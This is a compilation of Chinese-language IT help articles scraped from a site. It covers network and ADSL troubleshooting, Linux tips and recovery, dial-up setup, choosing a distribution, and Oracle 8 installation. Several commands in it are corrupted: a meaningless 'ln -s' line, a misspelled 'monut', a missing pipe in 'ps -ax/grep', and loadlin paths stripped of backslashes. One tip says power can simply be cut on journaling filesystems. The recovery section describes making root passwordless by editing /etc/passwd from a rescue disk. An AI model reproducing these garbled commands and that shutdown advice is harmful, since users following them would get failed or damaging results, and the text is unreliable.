    事实上，线路故障中很多情况都涉及到路由器，因此也可以把一些线路故障归结为路由器故障。检测这种故障，需要利用MIB变量浏览器，用它收集路由器的路由表、端口流量数据、计费数据、路由器CPU的温度、负载以及路由器的内存余量等数据，通常情况下网络管理系统有专门的管理进程不断地检测路由器的关键数据，并及时给出报警。而路由器CPU利用率过高和路由器内存余量太小都将直接影响到网络服务的质量。解决这种故障，只有对路由器进行升级、扩大内存等，或者重新规划网络拓扑结构。

    3. 主机故障

    主机故障常见的现象就是主机的配置不当。像主机配置的IP地址与其它主机冲突，或IP地址根本就不在子网范围内，由此导致主机无法连通。主机的另一故障就是安全故障。比如，主机没有控制其上的finger，RPC，rlogin等多余服务。而攻击者可以通过这些多余进程的正常服务或bug攻击该主机，甚至得到Administrator的权限等。还有值得注意的一点就是，不要轻易的共享本机硬盘，因为这将导致恶意攻击者非法利用该主机的资源。发现主机故障一般比较困难，特别是别人恶意的攻击。一般可以通过监视主机的流量、或扫描主机端口和服务来防止可能的漏洞。最后提醒大家不要忘了安装防火墙，因为这是最省事也是最安全的办法。


解决ADSL常见的网络故障

《一键清理系统垃圾》

返回总目录 上一页 目录页

解决ADSL常见的网络故障

我的ADSL自安装后基本上就没有正常过，不仅上网时经常掉线，而且速度还非常慢，让人不胜其烦。请问，可能是什么原因?应当如何解决?

    可能的故障原因有五个:

    第一，ADSL Modem或分离器故障。ADSL Modem或分离器的质量有问题，将造成频繁的掉线故障。建议借用一套能正常使用的设备，更换后再进行测试。
    第二，ADSL线路故障。住宅距离局方机房较远(通常应当小于3000米)，或线路附近有严重的干扰源，也会导致经常掉线。另外，在接线盒到ADSL Modem之间建议采用双绞线，即使采用平行线，也不应当超过5米。
    第三，室内电磁干扰。室内的电磁干扰比较严重(如无绳电话、空调、洗衣机、冰箱)，也可能导致通信故障，建议使ADSL Modem远离上述设备，并不与上述设备共用一条电源线。
    第四，网卡缺陷。网卡的质量有缺陷，或者驱动程序与操作系统的版本不匹配，也能导致频繁掉线。
    第五，PPPoE问题。这是系统中PPPoE软件安装不合理或软件兼容性不好引起的问题。一般来说，Windows XP建议使用系统本身提供的PPPoE协议和拨号程序。Windows 98/2000则可以安装Modem附送的PPPoE拨号程序。建议先安装系统安全补丁。除此之外，还应当确认ADSL Modem散热良好。

    ADSL间断性地无法获得IP地址

    操作系统为Windows XP，以ADSL方式接入Internet。刚安装的时候一切正常，然而，现在经常是每隔1天或几天，拨号的时候就提示:“无法获得IP地址，检查网线是否插好!”重启几次后又一切正常(有时要过很长时间)，怎么解决?

    ADSL有两种接入方式，即专线方式和虚拟拨号方式，而绝大多数用户采用的都是后者。虚拟拨号方式不仅便于局方按时计费，而且也便于节约有限的IP地址资源，即只有用户拨入时才会获得一个IP地址，断开连接时又自动释放。然而，IP地址池中的IP数量毕竟有限，当突发的用户数量较多时，IP地址将被分配殆尽，后面的用户再拨入时将无法获取IP地址，直至其他用户下线并释放出IP地址为止，所以，在Internet访问高峰时间，无法获取IP地址的问题将会更加突出。如确属该原因，不必重新启动计算机，只须稍过片刻重新拨号，即可获得IP地址。也就是说，如果过一会儿即可获取地址，故障原因自然就出自局方。

    另外，跳线水晶头松动也会导致连接时断时续的情况。因此，如果排除了局方原因，就应当检查以下各项内容:
    * 网线是否有问题，尤其是RJ-45头，与网卡的接触是否良好。
    * ADSL是否设置为“桥接(bridged)”方式。
    * 网卡及驱动程序是否有问题。
    * Windows XP操作系统是否有问题。

    上网正常但无法打开任何网页

    我有一台笔记本电脑，在单位通过局域网可以正常上网，回家后使用ADSL连接Internet就会出现问题。尽管电脑显示宽带连接正常，但却无法打开任何网页，无法实现Internet访问。ADSL Modem的所有LED指示灯显示正常。请问是什么原因?

    在单位通过局域网上网时，网卡设置的IP地址信息(IP地址、子网掩码、默认网关、DNS服务器IP地址)是单位局域网指定的。而在家中上网使用ADSL时，需要重新设置该网卡的IP地址信息。通常情况下，与ADSL Modem连接的网卡的IP地址信息应当设置为自动获取IP地址。也就是说，回到家后，应当将网卡的IP地址设置为“自动获得IP地址”，DNS设置为“自动获得DNS服务器地址”。然后，将该网卡连接至ADSL Modem，即可正常连接Internet了。

    IE总要检测代理服务器

    我的系统是Windows 2000，ADSL上网。前几天把Internet Explorer(简称IE)升到了6.0(原先是5.0)后，出现了一点问题，网还能上，但就是在打开IE的时候总要检测代理服务器设置，还非常慢，在以前没有出现过这种问题，不知什么原因?

    安装IE浏览器时，默认状态下，“局域网设置”中的“自动检测设置”复选框是被选中的。当打开IE浏览器时，IE将自动搜索局域网中的代理服务器设置，从而影响了IE访问Internet的速度。

    建议在IE浏览器的“工具”菜单中选择“Internet选项”，选择“连接”选项卡，单击“局域网设置”按钮，在“局域网(LAN)设置”对话框中取消对“自动检测设置”复选框的选中。单击“确定”按钮，保存所作的修改。


网络连接故障

《一键清理系统垃圾》

返回总目录

网络连接故障

◎宽带连接故障代码
◎二、RasPPPoE拨号软件出错信息
◎解决WindowsXP中无线网络连接故障
◎本地连接故障及解决
◎典型网络故障解决方法
◎解决无线网络连接故障
◎六步顺利排除计算机网络连接故障
◎如何快速排除网络故障
◎八大方法巧妙排除网络连接故障
◎如何快速排除网络故障
◎八大方法巧妙排除网络连接故障
◎IE浏览器自动关闭问题解决
◎网络应用不求人 故障及技巧集锦
◎轻松解决无线网络连接故障
◎Windows系统常见网络故障解决方法
◎常见网络故障分析
◎局域网网络故障排除策略
◎IP地址和硬件地址冲突的解决
◎网络常见故障分类和排查
◎网络故障详解
◎无线网络连接故障一网打尽
◎Linux网络连接故障排除(下)
◎Linux网络连接故障排除(上)
◎轻松解决网络软件故障
◎常见的网络故障排除办法
◎网络管理中的常见问题和解决方法
◎网络软件故障及处理
◎如何关闭进程中无法清除的进程
◎网络故障分层排查技巧
◎如何查找局域网中的故障
◎模式不当导致网络故障解决办法
◎梳理网络——故障排除点点通
◎网络故障诊断和排除
◎解决ADSL常见的网络故障

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


Linux操作系统12则经典应用技巧

《一键清理系统垃圾》

返回总目录 目录页 下一页

Linux操作系统12则经典应用技巧

    本文介绍了Linux操作系统应用过程中12则经典技巧，合理应用这些技巧可以更好的使用Linux系统。
    1、处理特殊的文件名

    假设Linux系统中有一个文件名叫“-ee”，如果我们想对它进行操作，例如要删除它，按照一般的删除方法在命令行中输入rm -ee命令，界面会提示我们是“无效选项”(invalid option)，原来由于文件名的第一个字符为“-”，Linux把文件名当作选项了，我们可以使用“--”符号来解决这个问题，输入“rm -- -ee”命令便可顺利删除名为“-ee”的文件。如果是其他特殊字符的话可以在特殊字符前加一个“”符号，或者用双引号把整个文件名括起来。

    2、直接进行Linux的安装工作

    在安装Linux操作系统时，可以利用该系统光盘中的一个名为“loadlin.exe”的软件，将Linux核心直接调入内存，由Linux核心代替当前操作系统来接管计算机，并进入Linux的安装界面。在安装Linux时，我们只要在运行对话框中输入“loadlin E:imagesvmlinuz root=/dev/ram initrd=E:imagesinitrd.img”这个命令就可以直接安装Linux了；其中“E:imagesvmlinuz”为Linux的核心名。

    3、消除Xwindows下的死机现象

    我们可以用两个常用的方法来消除这种现象：第一，用键盘上的复合键“Ctrl+Alt+Backspace”来关闭当前正在运行的任务；第二，首先按住键盘上的“Ctrl+Alt+F2”复合键，让系统切换到另一个操作台，然后登录到系统，再执行“#ps -ax/grep startx”命令，这将会列出你的Xserver的进程标识，接着在命令行中输入如下命令就能消除Xwindows下的死机现象：#kill -9 PID_Number，最后通过“Alt+F1”复合键返回到原来的平台。

    4、快速关闭Linux系统

    最新版本的Linux/UNIX系统借鉴了大型机的技术，采用了抗掉电的日志式文件系统，可以自动跟踪保存用户数据，自动同步刷新文件系统，用户完全可以随手关闭电源，从而达到快速关闭系统的目的。

    5、巧妙使用“rm”命令

    我们可以使用带“-r”参数的“rm”命令来删除一个非空目录，例如我们在命令行中输入“rm -r bbb”这样的命令，表示系统将把bbb目录中包含的所有文件和子目录全部删除掉。

    6、巧妙使用“Tab”键

    大家知道在Linux字符界面中输入命令时，有时需要输入很多字符，如果经常这样逐个地输入字符，比较麻烦。假设键入的字符足以确定该目录下一个惟一的文件时，我们只需按键盘上的“Tab”键就可以自动补齐该文件名的剩下部分，例如要把目录/ccc下的文件“ddddddd-1.2.3.tar.gz”解包时，当我们在命令行中键入到“tar xvfz /ccc/d”时，如果该文件是该目录下惟一以“d”打头的文件的话就可以直接按下“Tab”键，这时命令会被自动补齐为：tar xvfz /ccc/ddddddd-1.2.3.tar.gz ，从而提高了输入效率。

    7、多用鼠标拷贝与粘贴来提高操作速度

    Linux系统安装后，每次启动到字符界面时都会自动运行一个叫“gpm”的程序，该程序运行后就可以用鼠标来拷贝与粘贴了。具体做法是按住鼠标左键拖动使要拷贝的地方突出显示，这时突出显示的区域已经被拷贝，再按鼠标右键拷贝的内容就会被粘贴在光标所在位置了。如果我们在Xwindow下运行Linux系统，拷贝与粘贴的操作与在Windows 9x系统下一样。

    8、快速启动Linux系统

    在DOS下，有一种简单快速启动Linux的方法，那就是load Linux。loadlin.exe是DOS下的可执行程序，它可以在纯DOS环境下迅速启动Linux，而且无需重启计算机，通常我们可以在光盘的“/kernels”目录下找到这个程序。如果不知这个程序被放置于安装盘的何处，可以使用“find -name loadlin*”命令来寻找。找到之后将其复制到DOS分区中，同时还需要复制一份你所使用的Linux内核文件。可以通过Windows直接从光盘复制，也可在Linux环境下使用“mcopy”命令将文件复制到DOS分区；接着再编写一个名为“Linux.bat”的批处理文件，文件内容如下：c:loadlin c:vmlinuz root=/dev/hda1 ro(我们假设loadlin.exe和vmlinuz这两个内核文件都在c盘根目录下，“root”为Linux的根设备，而且Linux处于硬盘第一分区，所以设备名为“/dev/hda1”，“ro”意为readonly)。以后在DOS下要启动Linux时，运行“Linux.bat”就可以了。

作者：
来源：天极yesky


Linux常见故障的紧急处理方法

《一键清理系统垃圾》

Linux常见故障的紧急处理方法

    1．使用急救盘组进行维护
    急救盘组（也称为boot/root盘组），是系统管理员必不可少的工具。用它可以独立启动和运行一个完整的Linux系统。实际上，急救盘组中的第二张盘上就有一个完整的Linux系统，包括root文件系统；而第一张盘则存放了可启动的内核。
    使用急救盘组维护系统很简单。只需用这两张盘启动系统后，进入急救模式，这时使用的是root账户。为了能访问硬盘上的文件，需要手工安装硬盘文件系统。例如用下面的命令可在/mnt目录中安装/dev/hda2盘上的ext2fs类型的Linux文件系统：
    ＃ monut －t ext2/dev/hda2/mnt
    注：现在根目录是急救盘上的根目录。为了访问硬盘文件系统中的文件，必须先把它安装到某个目录下，如果将硬盘上文件系统安装在/mnt目录下，则硬盘上原来的/etc/passwd文件的路径就是/mnt/etc/passwd。
    2．文件系统被破坏时的处理方法
    当文件系统被破坏时，如果使用的是ext2fs类型的文件系统，就可从软盘运行e2fsck命令来修正文件系统中被损坏的数据。对于其他类型的文件系统，可以使用相应的fsck命令。当从软盘上检查文件系统时，最好不要用mount命令安装。
    注：文件系统被破坏的常见原因是超级块被损坏，超级块是文件系统的“头部”。它包含文件系统的状态、尺寸和空闲磁盘块等信息。如果损坏了一个文件系统的超级块（例如不小心直接将数据写到了文件系统的超级块分区中），那么Linux可能会完全不识别该文件系统，这样也就不能安装它了，即使采用e2fsck命令也不能处理这个问题。
    不过，ext2fs类型的文件系统将超级块的内容进行了备份，并存放于驱动程序的块组（block group）边界。可以用如下的命令通知e2fsck使用超级块的备份：
    ＃ e2fsck －b 8193
    －b 8193选项用于显示存放在文件系统中的8193块的超级块的备份数据。
    3．恢复丢失的文件
    如果不小心删除了重要的文件，还可以将相应的文件从急救盘复制到硬盘上。例如，删除了文件/bin/login，此时系统无法正常运行到登录界面，可以用急救盘组启动系统，将硬盘文件系统安装到/mnt目录下，然后使用下述命令：
    ＃cp －a /bin/login /mnt/bin
    “－a”选项用于告诉cp在拷贝时保持文件的访问权限。当然如果被删除的基本文件不在“急救盘组”中，也就不能用这种方法了。如果以前做过系统备份的话，那么就只有用以前的备份来恢复了。
    4．函数库破坏时的处理方法
    如果不小心将系统函数库文件破坏了，或者破坏了/lib目录下符号链接，那么将导致依赖这些库的命令无法执行。最简单的解决办法是用急救盘组启动系统，在/mnt目录中安装硬盘文件系统，然后修复/mnt/lib目录下的库。
    5.无法用root账号登录系统
    由于系统管理员的疏忽，或者由于系统受到黑客的入侵，系统管理员可能无法用root帐号登录系统。
    对于第1种情况，可能是系统管理员忘记了root密码，用急救盘组就可以解决问题。
    对于第2种情况，由于很可能是密码被黑客修改了，因此系统管理员无法进入系统，也就是说，Linux系统完全失去了控制，因此应尽快重新获得系统的控制权。在取得 root权限后，还应检查系统被破坏的情况，以防被黑客再次入侵。需要做的最主要的工作就是重新设置root的密码，获得Linux操作系统的控制权。首先用急救盘组启动系统，然后将硬盘的文件系统安装到/mnt目录下，编辑/mnt/etc/passwd文件，将其对应于root账户的一行加密口令域置空，如下所示：
    root::0:0:root:/root:bin/bash
    注：如果系统使用 shadow工具，就需要对文件/etc/shadow进行上述的操作，使root登录系统不需要口令。
    这样，root账户就没有口令了。当重新从硬盘启动Linux系统时，就可以用root账户登录（系统不会要求输入密码）。进入系统后，再用命令passwd设置新的口令。
    6．系统不能启动
    一般来说，如果系统管理员不能正常进入系统，就需要考虑使用急救盘组进入急救模式排除系统的故障。但在没有制作急救盘组的情况下，Linux系统不能启动，该怎么办呢？
    在个人计算机使用 Linux系统时，通常都是Linux和MS Windows 9X或MS Windows NT并存的。
    由于重新安装其他的操作系统，经常会导致原有的Linux不能启动。这主要是因为，这些操作系统默认为计算机中没有其他的操作系统，因而改写了硬盘的主引导记录（MBR），覆盖掉了Linux的LILO系统引导程序。
    如果有急救盘组，那么很简单，用第一张启动盘启动硬盘的Linux系统，重新运行LILO命令，就可以将LILO系统引导程序写回硬盘的主引导记录，再次开机即可。
    如果没有系统启动盘，如果知道Linux在硬盘上的确切安装分区，且有loadlin程序，就可以重新返回Linux。loadlin是DOS下的程序，运行它可以从DOS下直接启动Linux，快速进入Linux环境。在 Red Hat Linux 6.0光盘的 dosutil目录下就有这个程序。除此之外，还需要一个 Linux启动内核的映像文件vmlinuz，在 Red Hat linux 6.0光盘的 images目录下就有这个文件。
    例如，在Windows 98系统下面，进入DOS的单用户模式，然后运行下述的loadlin命令，即可重新进入Linux系统：
    loadlin vmlinuz root=/dev/hda8
    /dev/hda8是Linux的root文件系统所在的硬盘分区位置。命令执行后，就开始引导Linux系统。用root身份登录后，运行LILO命令，则重新将LILO装入MBR，回到以前多操作系统并存使用的状态。
    7．处理不正常关机引起的故障
    如果Linux不正常关机，有可能导致不能进入Linux的KDE环境而只能处于控制台环境下，而且不断地有大片大片的英文字符向上翻滚。以root身份login后，键入startx命令，出现“x server不能连接”的错误提示。
    这时可以在控制台下，键入setup，出现系统设置菜单，选择其中的“X窗口设置”，然后依照提示正确设置显示器的类型、刷新频率、显存大小、分辨率等。如果一切无误，系统会自动启动X Windows系统，一切便OK了！需要注意的一点是：在用setup进行设置时，可能还会有大片大片的英文字符向上翻滚，请不要惊慌，看清屏幕，继续使用TAB键或方向键，马上便会“柳暗花明”的。


Linux带你轻松上网

《一键清理系统垃圾》

Linux带你轻松上网

一、Bash Shell（字符界面）配置
1.安装Modem

----为了记忆方便，把你的Modem用/dev/modem的设备连接好，如你的Modem在DOS下是装在COM2上，可以用这样的命令： ＃ln －s dev/cau1 spd.hi

----然后设置Modem的最高速率：

＃setserial /dev/cau1 spd.hi 或 ＃setserial /dev/cau1 spd.vhi

----这两个命令的区别是前者可把Modem的最高速率设为57600bps，而后者可把Modem的最高速率设为115200bps。

2.设置拨号Script

----在所有Linux发布版本中都包含了PPP软件包，其中pppd和chat及一些有用的程序和Script都被自动装入。拨号呼出的典型Script如下：

/usr/sbin/pppd connect ′/usr/sbin/chat ″ ″ ATDT163 CONNECT ″ ″ ogin:username word:password ′ /dev/modem 38400 modem defaultrout

----这段文本必须作为一行保存在一个文本文件中。然后用chmod命令赋给它可执行属性 ，最好把它放在Sbin目录或Bin目录上以便直接执行。

----但是，如果你不是一个Linux高手，你很难创建一个适合自己的拨号Script，我们可以用Bash Shell下一个工具pppsetup来设置，这是一个非常方便的工具，只要把它的压缩文件放到一个临时目录,运行/pppsetup就行了。

phone number atdt163

modem com2

modem init str 默认

callback no

service provider domain name: lyg.js.cn

provider's nameserver ip address: 202.102.12.141

service provider CHAP

----填好以后，这个程序会在你的Sbin目录下自动产生一个ppp－go程序，你只要运行它就行了。

二、X－Window下配置

1.安装Modem

----在X－Window下安装Modem很简单，在控制面板上Modem图标上点一下，把你的Modem所在位置的那一行选中，然后按一下OK，就可以了。

2.配置Network

----点一下控制面板中网络配置图标，出现Network Configurator面板，上面有四个主选单：Names、Hosts、Interfaces、Routing。

Names：在HostName项中填入主机名，如：info

在Domain中填入域名，如：lyg.js.cn

在NameServer中填入DNS，如：202.102.12.141

HostName：IP就填主机的IP，Name和NickName不用说了。

----Interfaces：点击ADD按钮，在出现的设备选单上选 ppp后点击“OK”;输入“163（169）”，“UserName”and “Password”。点击“Customize”进入“Networking”，因为是动态IP，选择“Defaultroute”，然后点击“Done”存储配置。

----Routing：不用管它了。

----之后，系统将显示你的Interface Table，其上多了一个ppp0账号，就是你建好的拨号网络设备，点一下下面的激活按钮就能使用了。好了，听到拨号音了吗？那就恭喜你了，否则，再试一次。

返回


Linux的目录里都装些啥

《一键清理系统垃圾》

Linux的目录里都装些啥

----搞电脑的人总想知道自己的系统里到底有些什么东西，于是我就在Linux的根目录下运行ls -l（列目录命令），哇，一大串，这许多目录都放些什么呢？我硬着头皮往里钻，功夫不负有心人，终于将这迷宫的秘密揭开了。在此公布天下：
/bin
bin是binary的缩写。这个目录沿袭了UNIX系统的结构，存放着使用者最经常使用的命令。例如cp、ls、cat，等等。

/boot
这里存放的是启动Linux时使用的一些核心文件。

/dev
dev是device（设备）的缩写。这个目录下是所有Linux的外部设备，其功能类似DOS下的.sys和Win下的.vxd。在Linux中设备和文件是用同种方法访问的。例如：/dev/hda代表第一个物理IDE硬盘。

/etc
这个目录用来存放系统管理所需要的配置文件和子目录。

/home
用户的主目录，比如说有个用户叫wang，那他的主目录就是/home/wang也可以用~wang表示。

/lib
这个目录里存放着系统最基本的动态链接共享库，其作用类似于Windows里的.dll文件。几乎所有的应用程序都须要用到这些共享库。

/lost+found
这个目录平时是空的，当系统不正常关机后，这里就成了一些无家可归的文件的避难所。对了，有点类似于DOS下的.chk文件。

/mnt
这个目录是空的，系统提供这个目录是让用户临时挂载别的文件系统。

/proc
这个目录是一个虚拟的目录，它是系统内存的映射，我们可以通过直接访问这个目录来获取系统信息。也就是说，这个目录的内容不在硬盘上而是在内存里。

/root
系统管理员（也叫超级用户）的主目录。作为系统的拥有者，总要有些特权啊！比如单独拥有一个目录。

/sbin
s就是Super User的意思，也就是说这里存放的是系统管理员使用的管理程序。

/tmp
这个目录不用说，一定是用来存放一些临时文件的地方了。

/usr
这是最庞大的目录，我们要用到的应用程序和文件几乎都存放在这个目录下。其中包含以下子目录；

/usr/X11R6
存放X-Window的目录；

/usr/bin
存放着许多应用程序；

/usr/sbin
给超级用户使用的一些管理程序就放在这里；

/usr/doc
这是Linux文档的大本营；

/usr/include
Linux下开发和编译应用程序需要的头文件，在这里查找；

/usr/lib
存放一些常用的动态链接共享库和静态档案库；

/usr/local
这是提供给一般用户的/usr目录，在这里安装软件最适合；

/usr/man
man在Linux中是帮助的同义词，这里就是帮助文档的存放目录；

/usr/src
Linux开放的源代码就存在这个目录，爱好者们别放过哦！

/var
这个目录中存放着那些不断在扩充着的东西，为了保持/usr的相对稳定，那些经常被修改的目录可以放在这个目录下，实际上许多系统管理员都是这样干的。顺带说一下系统的日志文件就在/var/log目录中。

返回


Linux各个发行版本的选择

《一键清理系统垃圾》

Linux各个发行版本的选择

    Linux由于其“自由”和“开放”的特性，衍生出了数百种各具特色的发行版。所谓发行版，就是在Linux内核外包装一些软件，如我们常见的RedHat Linux、红旗Linux、Mandrake Linux等等，其本质??内核 还是一致的。但由于各种发行版侧重的用户群体不同，往往在使用上差异很大。

    由于在Linux上接触最多的还是它的外围软件，各种Linux的发行版对于软件的管理方式便成了权衡的一个重要因素。对于一个操作系统来说，不能没有一个像样的软件包管理器。

    没有软件包管理器的帮助，操作系统发行版的制作者将面临这样或那样的难题，用户安装、升级、卸载与发布软件包也将是非常麻烦的，系统管理也容易出现问题；相反,有了专门的软件包管理器，软件制作者易于制作和发行自己的软件了，而对于普通用户来说，软件包的安装维护将变得非常方便了。这样，对于一个操作系统的推广也会起到良好的促进作用。

    我将Linux的软件管理方式分成三类：

    ①基于RPM的软件包管理方式；
    ②基于deb的软件包管理方式；
    ③基于源代码的软件管理。下面分别就这三类谈谈我的认识和感受。

    基于RPM的软件包管理方式的发行版：RPM是RedHat Package Manager的缩写，意即RedHat（红帽子）软件包管理器。此类发行版的数量最多，用户群体也最大。国外有知名的如RedHat Linux、Mandrake Linux、SuSE Linux，国内有红旗Linux，Magic Linux，中标普华Linux等等。

    在这种Linux下安装软件，一般是选择已经编译好的RPM软件包，用rpm命令安装，系统会自动地把软件包解开，并复制到相应的目录中去，同时会在系统的数据库中加入软件包的相关信息。如果以后想要卸载某些软件，同样使用rpm命令加上参数-e，系统会去查询数据库，并删除相关的文件和目录。

    安装、删除软件都还比较方便，再加上网上可以下载的RPM软件包数量非常之多，使用的人多从而容易交流，因此这类发行版作为用户入门的首选显得非常不错。笔者在这里首推RedHat Linux（以及后来的Fedora）和Magic Linux，一个是国外的发行版，一个是国内的。RPM毕竟是自家的产品，又有庞大的用户群，软件的兼容性做得比较好，而其他的发行版总要或多或少的改改以便体现各自的“特色”，这样一来就容易出现兼容性问题，也就是人们常说的“软件包依赖问题”。

    国内的发行版之所以选择Magic Linux，主要是因为Magic Linux是一群爱好者们搞出来的Linux，没有多少商业化的驱使，对Linux本身改动很少，更容易让人体会到什么是“纯粹”的Linux，对于中文的支持也相当优秀。而红旗Linux和中标普华Linux太多地模仿Windows，对原本的Linux改动很大，正如前面所说，改动越大，日后越容易出现软件兼容性问题，笔者在这一点上是深有体会的。

    当然，不可否认RPM的软件包管理方式也就其缺点，最主要的就是上面所提到的“软件包依赖性问题”。由于一些软件在运行是往往还需要其他软件的支持，而用rpm命令安装软件包时系统会先检查它需要的软件是否已经安装，如果发现有一个它所依赖的软件包没有安装，安装程序就会退出，并让你先安装上其他软件，而在安装其他软件时又有可能发生依赖性问题……可以想象有多么麻烦！虽然rpm命令提供了“强制安装”选项，但除非你有很大的把握，否则“强制安装”上去的软件很难正常工作。

    为了解决这一恼人的问题，一些发行版使用了自己的解决方案，如Mandrake Linux在RPM的基础上加了一个前端界面，发现依赖性问题是它会自动到指定的网站上搜索并下载安装；Fedora提供了一个名为yum的前端程序，发现RPM依赖性问题时也会到指定的网站上下载并安装。

    不过RedHat Linux 9及其以前的版本并未提供这样的功能。可喜的是，现在有一种APT软件包管理器正在从Debian Linux上向RedHat Linux上移植，大家可以在http://apt.freshrpms.net/上找到适合自己的APT软件包管理器，下载安装就可以了，它可以较好地解决依赖性问题。至于APT的具体使用方法，读者可以自行查阅相关资料。

    基于deb的软件包管理方式的发行版：这种软件包管理方式主要用在Debian Linux上，目前国内的发行版如新华华镭Linux、Hiweed-Debian Linux也采用了这种方式。Debian Linux对于软件包的管理提供了多种工具，我所知道的有：

    l dselect -使用菜单界面的软件包管理工具（最上层的包管理工具）
    l dpkg -安装软件包（管理软件包中的文件）
    l apt-get - 安装软件包（管理软件包，CLI APT）
    l tasksel -安装任务套件（管理面向某方面任务的一套软件包）
    l aptitude -安装软件包（管理软件包和任务套件，ncurses APT）
    l deity -另一种ncurses APT
    l synaptic, gsynaptic -另一种GUI APT

    在自由软件里，以deb打包的软件数量是最多的。Debian Linux本身就是由世界各地的志愿者共同开发的，其理念也最接近Linux本质。它的软件包管理方式自诞生之日起就比RPM先进，可以说几乎没有所谓的依赖性问题，遇到缺少软件包的情况时会自动从网上下载或提示您需要哪一张光盘；也正因为如此，我们说Debian Linux对于网络的依赖性很大。

    在Debian Linux下，无论是对于开发者还是最终用户，deb软件包都是较好的选择。Debian Linux下的软件极其丰富，而且增长速度又逐年加快，最为重要的是，Debian下软件包的发布都要经过很严格的测试，所以Debian Linux的稳定性几乎是一流的。Debian Linux先进的软件包管理方式也造成了它的在线升级极其简单容易--只需一个命令！你不用担心自己的Linux过时而重新安装一个新版本的Linux，Debian Linux可以自动做好这一切。

    基于源代码的软件管理的发行版：这类Linux发行版较少，和其他发行版比起来有很大的不同。典型的有Gentoo Linux，LFS（严格地说LFS并不是一个Linux发行版）。以Gentoo Linux为例，它的灵活性很大。Gentoo Linux可以在一个一无所有的计算机上从源代码编译出一个完整的Linux操作系统，也可以像其他发行版那样安装已经编译好的软件包。

    在Gentoo Linux下安装源代码软件非常方便，只要一个emerge命令即可，系统会自动编译安装，如果需要其他软件的支持，Gentoo Linux会先从网上下载并安装。由于Gentoo Linux安装软件时通常要编译源代码，因此花的时间也就很多。

    比如你要从源代码安装OpenOffice，最好的办法是在晚上10点开始安装，第二天早上睡醒后一般就能安装上了^_^。但从源代码安装有不可比拟的好处，一个是能让你更加清楚Linux的原理，再就是由于是在自己的计算机上编译软件，编译后的二进制代码肯定更加适合自己的机器，运行速度往往比安装预先编译好的软件要快得多。所以有时候花点儿时间还是值得的。

    刚才还提到了LFS，LFS是Linux From Scratch的缩写，它是纯粹地从源代码编译出来的操作系统。安装它，你需要事先已经安装有一个Linux和一份安装手册。按照安装手册的说明在网上下载相应的源代码，在现有的Linux系统上编译另一个能够独立运行的Linux，听起来很富有挑战意义对吗？LFS的安装是最困难的，它根本就没有软件包的概念。

    LFS是完全由你来控制的，当你成功地安装了LFS后，你会对Linux有更加深入的认识。

    总结：如果你刚刚接触Linux，不妨选择第一类，RPM的软件包很多，在中国也很流行，遇到问题了也容易请教，笔者推荐以RedHat Linux、Fedora或Magic Linux来入门。如果你是一个Linux的使用者，看重方便和稳定，那么Debian Linux自然是你的首选。

    如果你认为对Linux有了一定的了解，想更好地“玩”Linux，或是想用Linux构建一个专门用途的高性能平台，那就选择Gentoo Linux或LFS吧！总之，一切的选择权在你自己！


Linux环境下Oracle的安装与配置

《一键清理系统垃圾》

Linux环境下Oracle的安装与配置

----随着Oracle for Linux 8.0.5版本的推出，Linux环境下的高端数据库应用也达到了一个新高度。但由于Oracle自身的复杂性，在Linux环境下安装涉及很多方面的因素。我们将分三个方面来讨论在Linux RedHat 6.0环境下Oracle 8.0.5的安装。
一、Linux核心与环境的调整

----在安装Oracle之前，要对RedHat 6.0的Linux内核与环境进行调整。

1.在完成RedHat 6.0 Linux的缺省安装后，需要安装以下软件包：

kernel－source－2.2.5－15.i386.rpm

Linux 2.2.5内核源码，主要用于修改核心参数后重生成内核。

tcl－8.0.4－29.i386.rpm

该软件包是安装Oracle Intelligent Agent包所必需的。

Compat－binutils－5.2－2.9.0.23.1.i386.rpm

Compat－glibc－5.2－2.0.7.2.i386.rpm

Compat－egcs－5.2－1.0.3a.1.i381.rpm

Compat－egcs－C＋＋－5.2－1/0/3a.1.i386.rpm

Compat－libs－5.2－1.i386.rpm

2.调整Linux核心参数

----根据Oracle 8.0.5对Linux核心内存参数的要求，可对Linux核心参数进行调整。编辑修改/usr/src/linux/include/asm/shmparam.h文件，修改SHMMAX选项。Oracle 推荐使用4294967295，这意味着系统的共享内存达到4G，这是不合适的。一般，SHMMAX的设置可略大于本机内存配置。

----事实上，缺省安装的RedHat 6.0核心运行Oracle 8.0.5是没有问题的。一般情况下可不对这些参数作出调整。

----如确需调整，在完成修改后，要按文档要求重生成核心，并用lilo命令指定用新的核心进行引导。

3.增加用户、创建安装目录

----Oracle安装与运行需要创建一个属于dba组的Oracle用户，同时要创建一个属主为Oracle用户的安装点目录，例如/u0/oracle ，并指定该目录为Oracle用户的缺省主目录。

----为了设置Oracle用户的运行环境，在Oracle用户的主目录下要建立一个脚本文件，用于在以Oracle用户登录时自动设置环境变量。该脚本文件的命名与用户所使用的shell有关（在/etc/passwd文件中定义）。如采用bash，则脚本文件是.bash_profile；如采用sh，则脚本文件名为.profile。以bash为例，在脚本文件.bash_profile中输入以下内容：

＃ ORACLE_HOME指定Oracle的安装目录

ORACLE_HOME=/u0/oracle; export ORACLE_HOME

＃ LD_LIBRARY_PATH指定Oracle的共享库目录

LD_LIBRARY_PATH= ＄ORACLE_HOME /lib; export LD_LIBRARY_PATH

ORACLE_BASE=＄ORACLE_HOME; export ORACLE_BASE

＃ ORACLE_SID指定Oracle数据库实例名，Oracle建议小于或等于4个字符

ORACLE_SID=BROS; export ORACLE_SID

＃ ORACLE_TERM Oracle用户的终端类型

ORACLE_TERM=ansi; export ORACLE_TERM

PATH=＄PATH: ＄ORACLE_HOME /bin; export PATH

＃TMPDIR指定临时目录，Oracle要求至少20M的空间

TMPDIR=/var/tmp; export TMPDIR

umask 022

----退出登录后，再以Oracle用户登录，测试环境变量是否符合要求。

二、 Oracle安装

----Oracle的安装可采用光盘或指定原始安装路径的方式。

----对用Oracle for linux光盘来安装的，应执行以下命令：

mount －t iso9660 /dev/CDROM /home/Oracle

----安装光盘介质。正常情况下，CDROM应安装在/home/CDROM目录下。

----对指定原始安装路径安装的，应事先将压缩档案文件805ship.tgz解压缩到一个临时目录，如/home/Oracle ,使用命令：

gunzip－c 805ship.tgz| tar xvf －

----假设使用指定原始安装路径/home/Oracle。在该目录执行：

cd orainst

sh oratab.sh

oratab.sh命令的主要目的是创建 /etc/oratab。

